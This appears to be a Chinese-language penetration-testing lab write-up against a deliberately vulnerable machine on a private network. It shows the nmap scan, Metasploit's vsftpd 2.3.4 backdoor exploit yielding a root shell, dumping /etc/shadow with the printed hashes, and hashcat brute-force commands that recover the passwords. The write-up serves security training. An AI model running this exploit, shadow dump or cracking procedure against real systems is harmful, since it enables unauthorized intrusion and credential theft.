192.168.91.131/24
192.168.91.128/24
fire1234
miss2345
$ sudo msfconsole
msf5 > nmap -sS 192.168.91.0/24 -p 1-10000
如下图, nmap 扫描出IP为 192.168.91.128
的主机有大量开放的端口, 此IP经核实也确实是攻击的目标靶机IP.
具体来看, 目标靶机开放了 ftp, ssh, telnet, mysql 等一系列端口
由于目标靶机开放着ftp的21端口, 因此考虑其是否存在 VSFTPD 源码包后门漏洞. 通过 Nmap 的 ftp-vsftpd-backdoor
脚本来进行扫描探测, 使用如下命令, 执行结果如下图所示, 可以看到存在该漏洞, 并且可以进行漏洞利用.
msf5> nmap -script ftp-vsftpd-backdoor -p 21 192.168.91.128
msf5> search vsftpd
2. 选用模块, 并设置选项中的 RHOSTS
为目标靶机的IP
msf5> use exploit/unix/ftp/vsftpd_234_backdoor
msf5> set rhost 192.168.91.128
msf5> exploit
4. 使用 ip addr
命令查看当前shell所属的主机IP, 可以看到为靶机的IP; 使用 id
命令查询可以看到当前 shell 已是 root 权限
5. 使用 cat
命令即可列出靶机 shadow 文件中的内容
$ cat /etc/shadow
如下图, 为靶机 shadow 文件的内容.
可以看到, msfadmin账号的内容为 msfadmin:$1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/:18758:0:99999:7:::
, root账号的内容为 root:$1$NeJ8RrE6$evRQK4nzgt2YAbGdYtJwS1:18758:0:99999:7:::
fire1234
$1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/:18758:0:99999:7:::
, 由第一部分的值为 1
可以确定加密算法为 md5, 由第二部分可以确定加密的盐值为 nWDuW2uH
, 加密后的密文为 nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/
$ hashcat -m 500 -a 3 ./msfadmin.txt ?l?l?l?l?d?d?d?d --force
其中 -m 500
表示对 md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
类型的哈希值进行破解; -a 3
表示为暴力破解; ./msfadmin.txt
中的内容即为 $1$nWDuW2uH$uFxlvdS8JbjduZj7t5hQo/
; 而 ?l?l?l?l?d?d?d?d
表示密码的掩码, 为前4位是小写字母, 后4位为数字; --force
为强制进行破解.
3. 进过一定时间的破解, 得到最终的结果为 fire1234
.
miss2345
破解过程同对账户 msfadmin 的破解过程, 使用 hashcat 进行密码破解, 在此不多赘述.
使用命令:
hashcat -m 500 -a 3 ./root.txt ?l?l?l?l?d?d?d?d --force